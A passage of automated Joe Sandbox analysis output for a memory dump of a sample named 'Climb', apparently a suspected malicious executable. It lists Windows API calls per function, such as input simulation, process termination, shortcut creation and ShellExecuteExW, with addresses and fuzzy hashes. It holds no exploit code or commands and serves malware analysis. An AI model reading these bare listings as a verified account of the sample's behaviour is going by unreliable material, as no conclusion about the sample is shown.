                                                                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                                                                      • Opcode ID: 95a6d5fc86a0f9403bd9814688a24d490ed54e0e6d443dd90528a33adb14b684
                                                                                                                                                                      • Instruction ID: 532b2a7c8370eadae87bf16c2ff4f09c4e52e8a5b570f6c60151f59f11adf059
                                                                                                                                                                      • Opcode Fuzzy Hash: 95a6d5fc86a0f9403bd9814688a24d490ed54e0e6d443dd90528a33adb14b684
                                                                                                                                                                      • Instruction Fuzzy Hash: 0DD15971508209AFD300EF25C881D6BBBE8FF98708F40495EF5959B2A2DB71ED45CB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 005611B3
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 005611EE
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0056120A
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00561283
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0056129A
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 005612C8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3368777196-0
                                                                                                                                                                      • Opcode ID: c8b06dae2ff3422c587c37a5c1da29a0b7f1ac28612486166f7252147ea8db25
                                                                                                                                                                      • Instruction ID: 6eb101c3cdf2bc4528b4ab55fcb8067e1ae443796d4481d3fc7536661c9b109a
                                                                                                                                                                      • Opcode Fuzzy Hash: c8b06dae2ff3422c587c37a5c1da29a0b7f1ac28612486166f7252147ea8db25
                                                                                                                                                                      • Instruction Fuzzy Hash: A8418175900205EFDF04EF54DC89AAABBB8FF44310F1440A5EE00AB296DB74DE95DBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0054FBEF,00000000,?,?,00000000,?,005339E2,00000004,00000000,00000000), ref: 00588CA7
                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00588CCD
                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00588D2C
                                                                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00588D40
                                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00588D66
                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00588D8A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                      • Opcode ID: 608d4d6e215484e45390c023d3ce85293fcb822d45c01fd9671c9debf4cfb46b
                                                                                                                                                                      • Instruction ID: 38b25d250c6921b7b25d3bfc50ffd0511a3c195721c9068f29f8102b268f444a
                                                                                                                                                                      • Opcode Fuzzy Hash: 608d4d6e215484e45390c023d3ce85293fcb822d45c01fd9671c9debf4cfb46b
                                                                                                                                                                      • Instruction Fuzzy Hash: 5C417130602645AFDB25EF24C889FB57FF1FB55304F5441A9E908AF2A2CB716C4ADB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00572D45
                                                                                                                                                                        • Part of subcall function 0056EF33: GetWindowRect.USER32(?,?), ref: 0056EF4B
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00572D6F
                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00572D76
                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00572DB2
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00572DDE
                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00572E3C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2387181109-0
                                                                                                                                                                      • Opcode ID: b88c7ec59d70569b76101ef1d8555e19da0f7a78b89895dfc5dee68cf85f64e5
                                                                                                                                                                      • Instruction ID: 813fd449fb599f313986280705e8c34828703ada087e0a16440d6d586ea337df
                                                                                                                                                                      • Opcode Fuzzy Hash: b88c7ec59d70569b76101ef1d8555e19da0f7a78b89895dfc5dee68cf85f64e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 0931CB72505316AFC720DF549849F9BBBE9FBC4314F00491AF889A7181DA30EA499BA2
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 005555F9
                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00555616
                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0055564E
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055566C
                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00555674
                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 0055567E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 72514467-0
                                                                                                                                                                      • Opcode ID: 43b8ed29a6bbac308c751ee34895daa71948f9fd93a1db20b680d3a5b1f4a69f
                                                                                                                                                                      • Instruction ID: 1f177823b1bb4ec83c86af044cb6586d6d39bbbec12cae16a5bedea6dd717d08
                                                                                                                                                                      • Opcode Fuzzy Hash: 43b8ed29a6bbac308c751ee34895daa71948f9fd93a1db20b680d3a5b1f4a69f
                                                                                                                                                                      • Instruction Fuzzy Hash: 57213132204640BBEB155B29DC29EBB7FA8FF84721F10402AFC05DA091FBA0CC8496A0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F55D1,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 004F5871
                                                                                                                                                                      • _wcslen.LIBCMT ref: 005662C0
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005663DA
                                                                                                                                                                      • CoCreateInstance.OLE32(00590CC4,00000000,00000001,00590B34,?), ref: 005663F3
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00566411
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                      • API String ID: 3172280962-24824748
                                                                                                                                                                      • Opcode ID: dfac0154d934d476d21d133115e38826a821644328fdbced17bfed432c349e7e
                                                                                                                                                                      • Instruction ID: 42289ed4acb4fc5b611e8293af97a8e0a62f947d2409f21a8830336b4fc28aa1
                                                                                                                                                                      • Opcode Fuzzy Hash: dfac0154d934d476d21d133115e38826a821644328fdbced17bfed432c349e7e
                                                                                                                                                                      • Instruction Fuzzy Hash: 35D15070A082059FCB14DF25C494A2ABBF6FF89714F10885DF98A9B361CB31EC45CB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,005136E9,00513355), ref: 00513700
                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0051370E
                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00513727
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,005136E9,00513355), ref: 00513779
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                      • Opcode ID: 1b1756c39bfb6bf8f4af741b7bc92af9a10439ecb7ab955830dc28a657110f51
                                                                                                                                                                      • Instruction ID: 32e9c3693a2696b2845e49d6f804ed1819b0b7916c5ab7a3a1afde650f1b36c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b1756c39bfb6bf8f4af741b7bc92af9a10439ecb7ab955830dc28a657110f51
                                                                                                                                                                      • Instruction Fuzzy Hash: 6901F5B65093122EB7643BB4BCAE9E62EA4FB65771B200339F410500E0FF116EC5A250
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00514D53,00000000,?,?,005168E2,?,?,00000000), ref: 005230EB
                                                                                                                                                                      • _free.LIBCMT ref: 0052311E
                                                                                                                                                                      • _free.LIBCMT ref: 00523146
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 00523153
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 0052315F
                                                                                                                                                                      • _abort.LIBCMT ref: 00523165
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                      • Opcode ID: 1bdbceee22f677a5baf6eb64a3e376936ad8ec0fd6724bb51184e577d3b6941a
                                                                                                                                                                      • Instruction ID: 889381eb979b13b88507b04127fec9a912e7844f881f5bbd71cebd854af35f0b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1bdbceee22f677a5baf6eb64a3e376936ad8ec0fd6724bb51184e577d3b6941a
                                                                                                                                                                      • Instruction Fuzzy Hash: 14F0863554452136C3152729BC0AA5A1F79BFD3761F210524FD14A22D1EE288916D571
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004F1F87
                                                                                                                                                                        • Part of subcall function 004F1F2D: SelectObject.GDI32(?,00000000), ref: 004F1F96
                                                                                                                                                                        • Part of subcall function 004F1F2D: BeginPath.GDI32(?), ref: 004F1FAD
                                                                                                                                                                        • Part of subcall function 004F1F2D: SelectObject.GDI32(?,00000000), ref: 004F1FD6
                                                                                                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 005894AA
                                                                                                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 005894BE
                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 005894CC
                                                                                                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 005894DC
                                                                                                                                                                      • EndPath.GDI32(?), ref: 005894EC
                                                                                                                                                                      • StrokePath.GDI32(?), ref: 005894FC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                      • Opcode ID: c2bc4424c124781998d1251d158966342fdd48b573a7400ee073fbe362414f33
                                                                                                                                                                      • Instruction ID: da3ba46d4affdc7b00c6cefa748aafe250de9d1b359ddd48d4335c92b1705f3e
                                                                                                                                                                      • Opcode Fuzzy Hash: c2bc4424c124781998d1251d158966342fdd48b573a7400ee073fbe362414f33
                                                                                                                                                                      • Instruction Fuzzy Hash: B611097200010DFFDF02AF90DC88EAA7FADEF18364F048011BE195A1A1D7719D59EBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004F32AF
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 004F32B7
                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004F32C2
                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004F32CD
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 004F32D5
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004F32DD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                      • Opcode ID: 0edcd7016de310b1b8c44322098fb66aca21e128c38df2bfc1f35e616fafa547
                                                                                                                                                                      • Instruction ID: 18478d9253e4f70ae57fbe52a7a4479fb47d7d31cef71d79d8f14b7a38917ed5
                                                                                                                                                                      • Opcode Fuzzy Hash: 0edcd7016de310b1b8c44322098fb66aca21e128c38df2bfc1f35e616fafa547
                                                                                                                                                                      • Instruction Fuzzy Hash: C30148B09017597DE3008F5A8C85A52FFA8FF19354F00411B915C4B941C7B5A864CBE5
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0055F447
                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0055F45D
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0055F46C
                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0055F47B
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0055F485
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0055F48C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                      • Opcode ID: 51ebca586a04e3d3279487d5e17481ecdc4ce8c7d5ee3e5d85d3a5954c64dbc1
                                                                                                                                                                      • Instruction ID: 6e245a51fcc48e5b88b8e11082e1785f5df5531676ef47a0b2f9741eae9486b5
                                                                                                                                                                      • Opcode Fuzzy Hash: 51ebca586a04e3d3279487d5e17481ecdc4ce8c7d5ee3e5d85d3a5954c64dbc1
                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF01D32241158BBE72157529C0EEEB3BBCEFD6B11F001059FA01A10D0E7A15A05E7B5
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(?), ref: 005334EF
                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00533506
                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 00533512
                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00533521
                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00533533
                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 0053354D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 272304278-0
                                                                                                                                                                      • Opcode ID: 929ec0b3b0b4d83bf8a8e8758bdb7e0b34d6ad1b973c41d6b0cc993b11119399
                                                                                                                                                                      • Instruction ID: 629699fe576f102de16bd2f9b19597dcb890fa11f16271558ca14704d6efc249
                                                                                                                                                                      • Opcode Fuzzy Hash: 929ec0b3b0b4d83bf8a8e8758bdb7e0b34d6ad1b973c41d6b0cc993b11119399
                                                                                                                                                                      • Instruction Fuzzy Hash: C6011631500109EFDB506B64DC08FA97BB2FB14721F510561FE1AA21E0DB321A55AB21
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005521CC
                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 005521D8
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005521E1
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005521E9
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005521F2
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005521F9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                      • Opcode ID: 2291b76c1b9402c8c8798232d3e7589ca4fe626f0981e9b0626f01cde1869afa
                                                                                                                                                                      • Instruction ID: 469d656bb9b4ae2573957630d7e1a1c0f90b2b39591d17895a02cf2b2bd8d873
                                                                                                                                                                      • Opcode Fuzzy Hash: 2291b76c1b9402c8c8798232d3e7589ca4fe626f0981e9b0626f01cde1869afa
                                                                                                                                                                      • Instruction Fuzzy Hash: 55E0E576004105BBDB012FA1EC0CD0ABFB9FF69322B105620FA25A20B4CB339424FB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0057B903
                                                                                                                                                                        • Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF
                                                                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 0057B998
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057B9C7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
